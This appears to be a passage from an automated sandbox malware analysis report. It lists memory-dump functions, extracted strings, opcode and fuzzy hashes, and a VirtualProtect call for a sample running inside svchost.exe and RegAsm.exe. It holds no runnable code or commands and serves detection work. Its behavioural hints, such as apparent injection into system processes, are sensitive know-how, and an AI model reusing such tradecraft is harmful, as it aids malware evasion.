Source File: 00000001.00000002.2293292105.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34650000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID: @du4$XNu4$`%s4$`%s4$`%s4$p(r4$p(r4
API String ID: 0-2585811647
Opcode ID: 3a6daa006bfd8d94c3d9b3db8ece54802d3d0a4693712eb6935784260dd6f7d1
Instruction ID: 55dadfaa5a4d45502abf2177a08c003dbfcbe8da103584fd6658888f758588fa
Opcode Fuzzy Hash: 3a6daa006bfd8d94c3d9b3db8ece54802d3d0a4693712eb6935784260dd6f7d1
Instruction Fuzzy Hash: FC22B370A1CB864FD7B8DF1888956A6B7E1EF95310F10467ED08DC7292DE39E842C782

Function 00007FFD347905E1 Relevance: 7.7, Strings: 5, Instructions: 1414COMMON

Download Yara Rule

Strings

8U4, xrefs: 00007FFD34790DFB
A, xrefs: 00007FFD34790D46
@U4, xrefs: 00007FFD34790E95
HU4, xrefs: 00007FFD34790F35
0U4, xrefs: 00007FFD34790D62

Memory Dump Source

Source File: 00000001.00000002.2294055199.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34790000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID: 0U4$8U4$@U4$A$HU4
API String ID: 0-3291831333
Opcode ID: 070a3bf5f942cdc717805cb0263ea385ceb280b618d33750efd9c3388e6c6f34
Instruction ID: 3949e02a85da30c010cd51436b853b80cb73368b6a4c12169f7259bcb0f109d8
Opcode Fuzzy Hash: 070a3bf5f942cdc717805cb0263ea385ceb280b618d33750efd9c3388e6c6f34
Instruction Fuzzy Hash: 22A207B2A1E7C58FEB56DB2888A55A47FE0EF57300F0905FAD189CB193D92D7806D381

Function 00007FFD34667240 Relevance: 3.2, Strings: 2, Instructions: 734COMMON

Download Yara Rule

Strings

HfS4, xrefs: 00007FFD346677BB
8is4, xrefs: 00007FFD3466774E

Memory Dump Source

Source File: 00000001.00000002.2293292105.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34650000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID: 8is4$HfS4
API String ID: 0-1756821087
Opcode ID: dfd8deabe3430ae39a2b1a2bca48cd982028837e3f227d5802c87233855e5255
Instruction ID: 896d150e6ba49149e02568ae3fcc35ce7438412bec8f13921dd29bc4816ddb08
Opcode Fuzzy Hash: dfd8deabe3430ae39a2b1a2bca48cd982028837e3f227d5802c87233855e5255
Instruction Fuzzy Hash: 3822C131B18A594FEB94EF2CD4A5AA977E1FF99311F0401BAE44DC72A2DE28EC41C741

Function 00007FFD3465126C Relevance: 2.0, Strings: 1, Instructions: 754COMMON

Download Yara Rule

Strings

#CP_^, xrefs: 00007FFD34651A14

Memory Dump Source

Source File: 00000001.00000002.2293292105.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34650000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID: #CP_^
API String ID: 0-2637653657
Opcode ID: e412457e2fed2077fea8f00ecb607067ad6bcb77412cbf40d879ce2ebde72ab3
Instruction ID: 88169defade489a97a0640bf8dd0b4411fdb4caa7ffcf77fe5a20357673f71ee
Opcode Fuzzy Hash: e412457e2fed2077fea8f00ecb607067ad6bcb77412cbf40d879ce2ebde72ab3
Instruction Fuzzy Hash: 84327451B2CA064BF358BABC94767B6A2C7EFA5708F7401BAD04DC72E7CC1DAC048652

Function 00007FFD34660C86 Relevance: 1.5, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

psn4, xrefs: 00007FFD34660D11

Memory Dump Source

Source File: 00000001.00000002.2293292105.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34650000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID: psn4
API String ID: 0-3322288917
Opcode ID: 6c4734a7007d55e38a6344dfe92304c2117a9bab4a51a098e02f03a924f0e026
Instruction ID: 7815e43f8791ab08ff79e16c2f46dfc84a97d0bf06b875acbd534b46bbc0005d
Opcode Fuzzy Hash: 6c4734a7007d55e38a6344dfe92304c2117a9bab4a51a098e02f03a924f0e026
Instruction Fuzzy Hash: 2981F231B0CA594FE359DF28C8A56B577E1EF96324B0442BED58EC7293DE2CE8428741

Function 00007FFD346612CD Relevance: 1.5, Strings: 1, Instructions: 274COMMON

Download Yara Rule

Strings

PFs4, xrefs: 00007FFD346614D2

Memory Dump Source

Source File: 00000001.00000002.2293292105.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34650000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID: PFs4
API String ID: 0-3153657676
Opcode ID: 07d13ddb0a2fefb6222d01673c4a0dbf5aaaad745157d88573455e52c21018f0
Instruction ID: 9f7dcbc18b39664a3f80ea095fafa002624b0eaf5f01dfad219f356319abbf07
Opcode Fuzzy Hash: 07d13ddb0a2fefb6222d01673c4a0dbf5aaaad745157d88573455e52c21018f0
Instruction Fuzzy Hash: 9181FA27B0D7624BE711AB7DE4A51E67B90EFD3239F0800B7D2C8DA093DD1C784A8695

Function 00007FFD34654E49 Relevance: 1.6, APIs: 1, Instructions: 140memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FFD34654F0D

Memory Dump Source

Source File: 00000001.00000002.2293292105.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34650000_LisectAVT_2403002A_29.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 755f7bf584868710785d369057dbe6cf79507015f40bc8ed634bc57e2425b900
Instruction ID: 995206215493c27d545c68c463cce8c168393134fc464af32a213761a78ed00c
Opcode Fuzzy Hash: 755f7bf584868710785d369057dbe6cf79507015f40bc8ed634bc57e2425b900
Instruction Fuzzy Hash: 57311A7190CB5C4FD7189FAD98566FE7BE0EF96321F00426FE089D3242DB7468068781

Function 00007FFD347902BB Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2294055199.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34790000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc0a3e3dca73459c1173e8e7ace6850f5e58de64e777a4f6f3a2a7d3c8f41abd
Instruction ID: 32bd59c9bfad1509a100ea3e52c97107db8ce2b5b912ddb655910e38f204193f
Opcode Fuzzy Hash: bc0a3e3dca73459c1173e8e7ace6850f5e58de64e777a4f6f3a2a7d3c8f41abd
Instruction Fuzzy Hash: 0F312562B0DAC54FE7A6966C18A52707BE2DFA6210B5801FFD049C72D7D90CBC46C381

Function 00007FFD34791331 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2294055199.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34790000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c133114656d6d253a3af432d5dfb400c546d132ca0fdebe4ac57cde2f365969
Instruction ID: e1c3a4aa0bd85cf9033bb4604228f0e2ce777a47378d9736960eff2187211ba4
Opcode Fuzzy Hash: 6c133114656d6d253a3af432d5dfb400c546d132ca0fdebe4ac57cde2f365969
Instruction Fuzzy Hash: 3611B192A0E7C64FE316876858B12A13FA1EFA7200B0901FBD0C8CB2D3D84D78168392

Function 00007FFD34790322 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2294055199.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34790000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e751e2cdce299cf6346717b81ddcd280487c3f6642b1f2cc3dcd01517208062a
Instruction ID: 3e3c16eb5ec5d82fd49db6f2b40d66787736173127e20c2af762aa6e0631eec9
Opcode Fuzzy Hash: e751e2cdce299cf6346717b81ddcd280487c3f6642b1f2cc3dcd01517208062a
Instruction Fuzzy Hash: 4CF0F012718F870BF7A896AD38E827563D2EB95111B48027FD54AC168ADE1CE8855380

Non-executed Functions

Function 00007FFD34660FFA Relevance: 15.3, Strings: 12, Instructions: 309COMMON

Download Yara Rule

Strings

0Is4, xrefs: 00007FFD346610D9
HIs4, xrefs: 00007FFD34661109
Is4, xrefs: 00007FFD346610B9
Ms4, xrefs: 00007FFD346611F9
Ks4, xrefs: 00007FFD34661199
Ks4, xrefs: 00007FFD34661189
8Is4, xrefs: 00007FFD346610E9
PIs4, xrefs: 00007FFD34661119
5O_I, xrefs: 00007FFD34661204
6O_I, xrefs: 00007FFD34661104
(Is4, xrefs: 00007FFD346610C9
@Is4, xrefs: 00007FFD346610F9

Memory Dump Source

Source File: 00000001.00000002.2293292105.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34650000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID: Is4$(Is4$0Is4$5O_I$6O_I$8Is4$@Is4$HIs4$PIs4$Ks4$Ks4$Ms4
API String ID: 0-864321288
Opcode ID: c465a6bfc576acd19f4e38e8680a75960c2af97fec2544a0c2722da3d1c6bef0
Instruction ID: 40231cb45de21d0ddbd8a939e2894db58796fe1d947c45f73481379cf3e395ce
Opcode Fuzzy Hash: c465a6bfc576acd19f4e38e8680a75960c2af97fec2544a0c2722da3d1c6bef0
Instruction Fuzzy Hash: 8B91D947B0E6E11BE7216A6DA8651F67B90EFD323971800F7D2C8CE197DC0CA84A97D1

Function 00007FFD3465D3F0 Relevance: 13.0, Strings: 10, Instructions: 515COMMON

Download Yara Rule

Strings

Xr4, xrefs: 00007FFD3465D619
xr4, xrefs: 00007FFD3465D649
LO_H, xrefs: 00007FFD3465D871
MO_H, xrefs: 00007FFD3465D76F
8r4, xrefs: 00007FFD3465D5F9
hr4, xrefs: 00007FFD3465D639
(r4, xrefs: 00007FFD3465D5E9
Hr4, xrefs: 00007FFD3465D609
Xr4, xrefs: 00007FFD3465D629
qO_I, xrefs: 00007FFD3465D604

Memory Dump Source

Source File: 00000001.00000002.2293292105.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34650000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID: (r4$8r4$Hr4$LO_H$MO_H$Xr4$Xr4$hr4$qO_I$xr4
API String ID: 0-3081127587
Opcode ID: e534816739a5d2c4a9773595bdd916f3e0be0d3796649434123b31b0b59b8f3d
Instruction ID: cbf152de16296c2bbb8c5fd27075a9306af18cc7662b17ce830b60e8b402535a
Opcode Fuzzy Hash: e534816739a5d2c4a9773595bdd916f3e0be0d3796649434123b31b0b59b8f3d
Instruction Fuzzy Hash: 76E10B43F1D6960AE764BAADA4B51FA2781EFD6229B0881F7D1CCCA1D7EC1CA8474250

Function 00007FFD3465E2B0 Relevance: 3.0, Strings: 2, Instructions: 542COMMON

Download Yara Rule

Strings

`ks4, xrefs: 00007FFD346726D8
`ks4, xrefs: 00007FFD34672745

Memory Dump Source

Source File: 00000001.00000002.2293292105.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffd34650000_LisectAVT_2403002A_29.jbxd

Similarity

API ID:
String ID: `ks4$`ks4
API String ID: 0-465773164
Opcode ID: 6866c1057a8f4c6ae7e6d6fa12dd21a19a473e13cce5e49d71ef63d43e69f36f
Instruction ID: 61ec8b38744a612bc080de49f94f61311c663c757fef2e63b7e7e16158795e76
Opcode Fuzzy Hash: 6866c1057a8f4c6ae7e6d6fa12dd21a19a473e13cce5e49d71ef63d43e69f36f
Instruction Fuzzy Hash: FAE14871B1DA494FE358DE2C98A51B177D1FB96324B14827ED58FC3286DA28BC438381

Analysis Process: svchost.exePID: 3260, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	17.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD347C082B Relevance: 7.4, Strings: 5, Instructions: 1151
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@X4, xrefs: 00007FFD347C0E95
HX4, xrefs: 00007FFD347C0F35
A, xrefs: 00007FFD347C0D46
8X4, xrefs: 00007FFD347C0DFB
0X4, xrefs: 00007FFD347C0D62

Memory Dump Source

Source File: 00000009.00000002.2440517125.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd347c0000_svchost.jbxd

Similarity

API ID:
String ID: 0X4$8X4$@X4$A$HX4
API String ID: 0-337243
Opcode ID: b9630dfd15fab5a84cdcee5665f1c7f4302dd39a257e2fcc601837e9a178729f
Instruction ID: bf41c084f88213b221bc3f5e8e3810b0923f99b145dec22f85755fedde229f72
Opcode Fuzzy Hash: b9630dfd15fab5a84cdcee5665f1c7f4302dd39a257e2fcc601837e9a178729f
Instruction Fuzzy Hash: 3982F5B2A0D7C68FEB56DB6888A55947BE0EF57300F0905FAC189CB192DA2C7C46D7C1

Function 00007FFD347C13E9 Relevance: 1.7, Strings: 1, Instructions: 468COMMON

Download Yara Rule

Strings

A, xrefs: 00007FFD347C149D

Memory Dump Source

Source File: 00000009.00000002.2440517125.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd347c0000_svchost.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 91e184cde90044c1c2bf9962b031a2b32674a3334330f253e2e011e8fe35d1bd
Instruction ID: 2d6bdc5689dc3cc4bd1088ae40e2b798a46d26b507c7a0c3cf236ae5980b9e6a
Opcode Fuzzy Hash: 91e184cde90044c1c2bf9962b031a2b32674a3334330f253e2e011e8fe35d1bd
Instruction Fuzzy Hash: 2FE12BB2A0E7C59FE752CB2498A55A47FE0EF57200B0901FAD589DB193D92CBC05C7D1

Function 00007FFD34684E49 Relevance: 1.6, APIs: 1, Instructions: 138memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FFD34684F0D

Memory Dump Source

Source File: 00000009.00000002.2436130654.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34680000_svchost.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7d20d3fd45ab416a8c509ace8f4a48ee965c039280b744f530d334697567bcf5
Instruction ID: 7529633a531f53b98bca1dd945bbb8af2e59528645bfca8b207ecb6c4541c7da
Opcode Fuzzy Hash: 7d20d3fd45ab416a8c509ace8f4a48ee965c039280b744f530d334697567bcf5
Instruction Fuzzy Hash: 5031F831A0C75C4FDB189F9D98566FE7BE1EF96311F00427FE089D3242DA7468058782

Function 00007FFD347C21F0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440517125.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd347c0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebb6fbe3e44ffadce426c461d76537a0253ff91faf485c5a1318f0c1bed70d9b
Instruction ID: fe69f010132421577dbe174878029dd2f25f8abfaba8d175812512cccc818568
Opcode Fuzzy Hash: ebb6fbe3e44ffadce426c461d76537a0253ff91faf485c5a1318f0c1bed70d9b
Instruction Fuzzy Hash: 52F01D71A0895D8FDFA0DA08C880BD8B7B0FBA8300F0041E6808DE3111DA306AC18F40

Function 00007FFD347C0330 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2440517125.00007FFD347C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd347c0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25f6f7c6161690246f1cdd10a9905bdb49e17cb8d66c27c937de769152b2283d
Instruction ID: 4fc0ded309abcabe7d4fe772af802e522cfaaf35ad74fc7760abec8f22ade4c8
Opcode Fuzzy Hash: 25f6f7c6161690246f1cdd10a9905bdb49e17cb8d66c27c937de769152b2283d
Instruction Fuzzy Hash: 85E0C222B08E4A1FEBD5A99D38D827962D3D7D911139811BFE00EC329BDC289C468380

Analysis Process: svchost.exePID: 1808, Parent PID: 6872COMMON

Execution Graph

Execution Coverage:	17.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD347D082B Relevance: 7.4, Strings: 5, Instructions: 1149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

HY4, xrefs: 00007FFD347D0F35
A, xrefs: 00007FFD347D0D46
8Y4, xrefs: 00007FFD347D0DFB
@Y4, xrefs: 00007FFD347D0E95
0Y4, xrefs: 00007FFD347D0D62

Memory Dump Source

Source File: 0000000A.00000002.2406388448.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd347d0000_svchost.jbxd

Similarity

API ID:
String ID: 0Y4$8Y4$@Y4$A$HY4
API String ID: 0-1149788535
Opcode ID: 8228d05d746886df06344fdb5778582c6b40d304d52476eb503f3fe87ebb89ea
Instruction ID: 073d4d83af7f2cc0b23e37457e3781c14e9d2480940cba41cf02bc77895bc9d3
Opcode Fuzzy Hash: 8228d05d746886df06344fdb5778582c6b40d304d52476eb503f3fe87ebb89ea
Instruction Fuzzy Hash: F2821AB2A1F7C58FEB56DB2888A55A47FE0EF57304F0805FAC189CB193D919780AD781

Function 00007FFD347D13E9 Relevance: 1.7, Strings: 1, Instructions: 461COMMON

Download Yara Rule

Strings

A, xrefs: 00007FFD347D149D

Memory Dump Source

Source File: 0000000A.00000002.2406388448.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd347d0000_svchost.jbxd

Similarity

API ID:
String ID: A
API String ID: 0-3554254475
Opcode ID: 71050641f473fac48077952a2c8b1e1a37d451c3bb791112d4249aad70376033
Instruction ID: 7e06ab00cf041e67df239843fffe5f4f76cb2d88a7707d1a3a5f79189164fda1
Opcode Fuzzy Hash: 71050641f473fac48077952a2c8b1e1a37d451c3bb791112d4249aad70376033
Instruction Fuzzy Hash: 98D108A2A1F7C58FE7529B2848A55A57FE0EF57200F0901FAD18AC71A3D91CBC4AD391

Function 00007FFD34694E49 Relevance: 1.6, APIs: 1, Instructions: 138memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007FFD34694F0D

Memory Dump Source

Source File: 0000000A.00000002.2405009440.00007FFD34690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd34690000_svchost.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 645df86b237059d811def8d39ed9d501c71f98bafb2a3edd1120877a537836cc
Instruction ID: 1cdb49a74286c8e51484249bbb4392d4a6d4b055026051c253547d0cc781d489
Opcode Fuzzy Hash: 645df86b237059d811def8d39ed9d501c71f98bafb2a3edd1120877a537836cc
Instruction Fuzzy Hash: 8231F831A0C75D4FDB28DFA898566FD7BE1EF96321F00426FE089D3292DA7468058792

Function 00007FFD347D0295 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2406388448.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd347d0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6de1dea0e1d6bd55d060dc95886da402dd50698f89fe514086d30d3041bba80
Instruction ID: 90ee340f3558437756c89531b5baccc37a9f495e16b01e2e9fa3f91fba8a215a
Opcode Fuzzy Hash: f6de1dea0e1d6bd55d060dc95886da402dd50698f89fe514086d30d3041bba80
Instruction Fuzzy Hash: 4031D362B1FBC64FE7A68A6C58E41707BE1EF9B21475801FFD189C71D7D908AC498381

Function 00007FFD347D21F0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2406388448.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd347d0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e140aad70f8f7611611bd9fe5272dbb980b9895637bd6e4867cf97fb083aabd8
Instruction ID: fb5d5a2802061d15e7ba649b557ea493a93c6583cf7597fe6c5f4d2ddcc43b1b
Opcode Fuzzy Hash: e140aad70f8f7611611bd9fe5272dbb980b9895637bd6e4867cf97fb083aabd8
Instruction Fuzzy Hash: 3EF03171A1895D8FDFA1DA0CC880BDDB7F0FBA8300F0041E6908DE3101DA30AAC58F40

Function 00007FFD347D0322 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2406388448.00007FFD347D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffd347d0000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f6159c37a61581f5330bd90bea9615b5019c78e37c82711d103805a3382d499
Instruction ID: b482b4d1309a87756b60cb2384c7b0ce0bf877c3427a24b5faea0dfd4285685a
Opcode Fuzzy Hash: 0f6159c37a61581f5330bd90bea9615b5019c78e37c82711d103805a3382d499
Instruction Fuzzy Hash: 53E02212B1AE4B0BEAE8964D38E023822D2EB9A111788507FE10EC228ACC1CEC494340

Analysis Process: RegAsm.exePID: 2016, Parent PID: 3260COMMON

Executed Functions

Function 011E9BE8 Relevance: 3.0, Instructions: 2977COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2523784372.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_11e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6d9ef6545189b0be552961309f86b231f290f10a75c36458a3dc027ce16f677
Instruction ID: 63ec84d697b9a45a360517ebe2741c6bef76e1cb15611b34be7e5adc5f7114d1
Opcode Fuzzy Hash: c6d9ef6545189b0be552961309f86b231f290f10a75c36458a3dc027ce16f677
Instruction Fuzzy Hash: 2163FA31D10B5A8ACB15EF68C8846A9F7B1FF99300F15C79AE45877121FB70AAD4CB81

Function 011E9378 Relevance: .6, Instructions: 609COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2523784372.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_11e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d36c753bcb6995f149eeecd8927f9c1e2a9cfcb472d89ca414c7c71f14a56856
Instruction ID: 11f211961a1cbb223325c035a6b6e9103b6820211c901f0533d67accc32eebe7
Opcode Fuzzy Hash: d36c753bcb6995f149eeecd8927f9c1e2a9cfcb472d89ca414c7c71f14a56856
Instruction Fuzzy Hash: B1227D34A006098FDB19DFA8D598AADBBF2FF88314F248569E905EB395DB70DC41CB50

Function 011E4A98 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2523784372.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_11e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03752ea7dd96e64a3672381508e7da79c6ad559a997a3cb4aac42682b5171914
Instruction ID: a3a56213cb9a5d700ed8384f6eb1a2683457b113a16fd61f80673cb84cd1ce73
Opcode Fuzzy Hash: 03752ea7dd96e64a3672381508e7da79c6ad559a997a3cb4aac42682b5171914
Instruction Fuzzy Hash: A1B18D70E00A098FEF18CFE9C89979DBBF2BF88714F148129D815E7654EB759885CB81

Function 011E3E80 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2523784372.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_11e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca7dbfe0596f5c72140f9276b0b0a8643fe15b8fde6c09cdcc446ecf84a5e48c
Instruction ID: 9fb35fb0254fc5b44a44df9899f3af43dd49a0354b8416251ffe148c6a34a0e2
Opcode Fuzzy Hash: ca7dbfe0596f5c72140f9276b0b0a8643fe15b8fde6c09cdcc446ecf84a5e48c
Instruction Fuzzy Hash: 64915870E00A498FDF18CFA9C9997DEBBF2BF88714F148129E415E7254EB749845CB82

Function 011E790A Relevance: .6, Instructions: 556COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2523784372.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_11e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 149ef5dccfa808dbfd6ed55a10dfe4127fa2396cb845865546583163319c2c3c
Instruction ID: 934f3b8fe070bdddcfb81d10b285aa2c9cb48d825591ecf5f4b3f85aaea1cc85
Opcode Fuzzy Hash: 149ef5dccfa808dbfd6ed55a10dfe4127fa2396cb845865546583163319c2c3c
Instruction Fuzzy Hash: AB123D30710206DBEB1AAB7CE89426A36A3FBC6354B104A2CE105DB795DFB5DC47C7A1

Function 011ECDA8 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2523784372.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_11e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 860315c37cab9f6aa31898e838483e48a07c994966c2a3f50a17d9b25887e98d
Instruction ID: 61cab632f1fd9e3ed12cb29a94c6d5b1fb802600296099f094827232f74b1353
Opcode Fuzzy Hash: 860315c37cab9f6aa31898e838483e48a07c994966c2a3f50a17d9b25887e98d
Instruction Fuzzy Hash: 44C1EF31B006559FDB19DBA8C884B6EBBF6EBC5310F24856AE405CB296DB31EC42C7D1

Function 011E4A8C Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2523784372.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_11e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac94f6f2db6b36e970c40cfd2559bf5234f5ae7ed55029adb2ee29642486954
Instruction ID: 6d13a74c8bc2d2fdcc48fef44045c2c35e3e279e8a31c1e2a637eb00f773a683
Opcode Fuzzy Hash: 4ac94f6f2db6b36e970c40cfd2559bf5234f5ae7ed55029adb2ee29642486954
Instruction Fuzzy Hash: 4DB14A70E00A098FEF18CFE8C89979DBBF1BF88714F148129D815EB654EB759885CB81

Function 011E9364 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2523784372.00000000011E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_11e0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aedfcbefe0da9f79203f93e56f9c9a566c042e058003c8d3c04922d022558e7
